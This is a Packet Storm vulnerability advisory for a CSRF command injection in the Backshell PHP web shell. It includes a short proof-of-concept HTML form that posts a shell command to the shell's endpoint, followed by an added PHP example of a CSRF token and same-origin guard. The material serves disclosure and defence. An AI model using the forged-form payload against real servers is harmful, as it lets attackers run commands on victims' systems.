Backshell Web Shell Cross Site Request Forgery

2015-12-25T00:00:00
ID PACKETSTORM:135072
Type packetstorm
Reporter Ehsan Hosseini
Modified 2015-12-25T00:00:00

Description

                                        
`================================================================================  
# Backshell Web Shell - CSRF Command Injection  
================================================================================  
# Vendor Homepage: https://github.com/neitanod/backshell  
# Date: 25/12/2015  
# Software Link: https://github.com/neitanod/backshell/archive/master.zip  
# Author: Ashiyane Digital Security Team  
# Contact: hehsan979@gmail.com  
# Source: http://ehsansec.ir/advisories/bshell-csrf-rce.txt  
================================================================================  
# Exploit :  
  
<form action="http://localhost/a/bshell.php" method="post">  
<input type="hidden" name="cmd" value="mkdir ehsan">  
<input type="submit" value="submit">  
</form>  
  
  
================================================================================  
# Discovered By : Ehsan Hosseini (EhsanSec.ir)  
================================================================================  
`
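
The form above carries only a `cmd` field, so nothing in the request ties it to a page the shell itself served. The PHP guard below is an added example of the usual server-side check (session-bound token plus same-origin test); it is not Backshell's code and not part of the advisory, and the `csrf_token` field name and its placement ahead of command handling are assumptions.

```php
<?php
declare(strict_types=1);

// Added example: hypothetical guard for a POST endpoint that accepts a "cmd"
// field, like the one targeted by the form in the advisory.

// SameSite=Strict keeps the session cookie off cross-site form posts.
session_set_cookie_params(['samesite' => 'Strict', 'httponly' => true]);
session_start();

// One random token per session; the page that renders the command form must
// embed it as a hidden "csrf_token" field (assumed field name).
if (empty($_SESSION['csrf_token'])) {
    $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
}

/** True only when Origin (or Referer as fallback) names this host. */
function same_origin(array $server): bool
{
    $source = $server['HTTP_ORIGIN'] ?? $server['HTTP_REFERER'] ?? '';
    $host = parse_url($source, PHP_URL_HOST);
    if (!is_string($host)) {
        return false; // header absent, "null", or not a URL
    }
    $port = parse_url($source, PHP_URL_PORT);
    $seen = $port ? "$host:$port" : $host;
    return strcasecmp($seen, $server['HTTP_HOST'] ?? '') === 0;
}

/** Accept only same-origin POSTs that carry this session's token. */
function csrf_ok(array $server, array $post, array $session): bool
{
    $sent  = $post['csrf_token'] ?? '';
    $known = $session['csrf_token'] ?? '';
    return ($server['REQUEST_METHOD'] ?? '') === 'POST'
        && same_origin($server)
        && is_string($sent) && is_string($known) && $known !== ''
        && hash_equals($known, $sent); // constant-time comparison
}

if (isset($_POST['cmd']) && !csrf_ok($_SERVER, $_POST, $_SESSION)) {
    http_response_code(403);
    exit('Request rejected: missing or invalid CSRF token');
}
// Command handling would run below this point, for verified requests only.
```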